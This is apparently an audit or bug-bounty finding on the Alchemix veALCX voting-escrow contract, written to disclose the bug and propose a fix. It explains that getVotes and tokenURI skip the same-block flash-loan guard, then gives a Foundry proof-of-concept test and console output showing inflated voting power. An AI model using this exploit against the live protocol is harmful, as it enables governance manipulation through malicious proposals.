function balanceOfToken(uint256 _tokenId) external view returns (uint256) {
if (ownershipChange[_tokenId] == block.number) return 0;
return _balanceOfTokenAt(_tokenId, block.timestamp);
The balanceOfToken() first checking if ownership change of the _tokenId is in the current block, if it is then return zero. This check is necessary to have a newly transferred veALCX tokens to have zero voting balance to prevent someone from flash-loaning veALCX to inflate their voting balance.
However, this check is not there in balanceOfTokenAt and _balanceOfTokenAt functions.
function _balanceOfTokenAt(uint256 _tokenId, uint256 _time) internal view returns (uint256) {
uint256 _epoch = userPointEpoch[_tokenId];
// If time is before before the first epoch or a tokens first timestamp, return 0
if (_epoch == 0 || _time < pointHistory[userFirstEpoch[_tokenId]].ts) {
return 0;
} else {
// Binary search to get point closest to the time
uint256 _min = 0;
uint256 _max = userPointEpoch[_tokenId];
for (uint256 i = 0; i < 128; ++i) {
// Will be always enough for 128-bit numbers
if (_min >= _max) {
uint256 _mid = (_min + _max + 1) / 2;
if (userPointHistory[_tokenId][_mid].ts <= _time) {
_min = _mid;
} else {
_max = _mid - 1;
Point memory lastPoint = userPointHistory[_tokenId][_min];
// If max lock is enabled bias is unchanged
int256 biasCalculation = locked[_tokenId].maxLockEnabled
? int256(0)
: lastPoint.slope * (int256(_time) - int256(lastPoint.ts));
// Make sure we still subtract from bias if value is negative
lastPoint.bias -= biasCalculation;
if (lastPoint.bias < 0) {
lastPoint.bias = 0;
return uint256(lastPoint.bias);
As a result, alchemix or some external protocol trying to use balanceOfToken and balanceOfTokenAt external functions to find voting balance will return different voting balances for the same _tokenId depending on which function they called.
As can be seen, _balanceOfTokenAt internal function which don't have flashloan protection check is called in getVotes function to compute voting balance of an account.
Its possible that alchemix or external protocols will use getVotes function to compute the voting balance of an account to use it in their calculation. Due to the use of _balanceOfTokenAt function which don't have flashloan protection, will allow users to inflate their voting power by taking a flashloan of veALCX.
Since, tokenURI function is also using same vulnerable _balanceOfTokenAt function, same attack we can perform to change the tokenURI for any _tokenId.
Since users are able to inflate their voting power, which they can use to vote for a malicious governance proposal. Same attack we can also use to alter tokenURI.
Flashloan protection check should be implemented in _balanceOfTokenAt function.
Paste following foundry code in src/test/VotingEscrow.t.sol
Run using FOUNDRY_PROFILE=default forge test --fork-url $FORK_URL --fork-block-number 17133822 --match-contract VotingEscrowTest --match-test testVoteInflationByTransferToken -vvv
// Check inflation of votes using flashloaning veALCX
function testVoteInflationByTransferToken() public {
address user1 = address(0x101);
address user2 = address(0x102);
uint256 tokenId = createVeAlcx(user1, TOKEN_1, MAXTIME, false);
assertEq(veALCX.ownerOf(tokenId), user1);
console.log("balanceOfToken(tokenId) :", veALCX.balanceOfToken(tokenId));
// console.log("balanceOfTokenAt(tokenId) :", veALCX.balanceOfTokenAt(tokenId, block.timestamp));
console.log("getVotes(user1) :", veALCX.getVotes(user1));
console.log("getVotes(user2) :", veALCX.getVotes(user2));
assertEq(veALCX.balanceOfToken(tokenId), getMaxVotingPower(TOKEN_1, veALCX.lockEnd(tokenId)));
assertEq(veALCX.balanceOfToken(tokenId), veALCX.balanceOfTokenAt(tokenId, block.timestamp));
assertEq(veALCX.balanceOfToken(tokenId), veALCX.getVotes(user1));
assertEq(veALCX.getVotes(user2), 0);
// Take a flashloan of veALCX
console.log("\nTake a flashloan of veALCX token");
uint256 tokenId2 = createVeAlcx(user2, TOKEN_1M, MAXTIME, false);
console.log("Created VeALCX with 1M locked tokens");
console.log("getVotes(user2) :", veALCX.getVotes(user2));
assertEq(veALCX.balanceOfToken(tokenId2), getMaxVotingPower(TOKEN_1M, veALCX.lockEnd(tokenId2)));
// Transferring tokenId2 from user2 to user1
console.log("\nTransferring flashloaned tokenId2 from user2 to user1");
veALCX.safeTransferFrom(user2, user1, tokenId2);
assertEq(veALCX.ownerOf(tokenId2), user1);
console.log("balanceOfToken(tokenId) :", veALCX.balanceOfToken(tokenId));
console.log("balanceOfToken(tokenId2) :", veALCX.balanceOfToken(tokenId2));
console.log("balanceOfTokenAt(tokenId2):", veALCX.balanceOfTokenAt(tokenId2, block.timestamp));
console.log("getVotes(user1) : %s <= Inflated voting power", veALCX.getVotes(user1));
console.log("getVotes(user2) :", veALCX.getVotes(user2));
assertEq(veALCX.balanceOfToken(tokenId2), 0);
assertEq(veALCX.getVotes(user1), veALCX.balanceOfToken(tokenId) + veALCX.balanceOfTokenAt(tokenId2, block.timestamp));
Console Output:
> FOUNDRY_PROFILE=default forge test --fork-url $FORK_URL --fork-block-number 17133822 --match-contract VotingEscrowTest --match-test testVoteInflationByTransferToken -vvv
Ran 1 test for src/test/VotingEscrow.t.sol:VotingEscrowTest
[PASS] testVoteInflationByTransferToken() (gas: 2317763)
balanceOfToken(tokenId) : 1994518328243124355
getVotes(user1) : 1994518328243124355
getVotes(user2) : 0
Take a flashloan of veALCX token
Created VeALCX with 1M locked tokens
getVotes(user2) : 1994518328259766615659745
Transferring flashloaned tokenId2 from user2 to user1
balanceOfToken(tokenId) : 1994518328243124355
balanceOfToken(tokenId2) : 0
balanceOfTokenAt(tokenId2): 1994518328259766615659745
getVotes(user1) : 1994520322778094858784100 <= Inflated voting power
getVotes(user2) : 0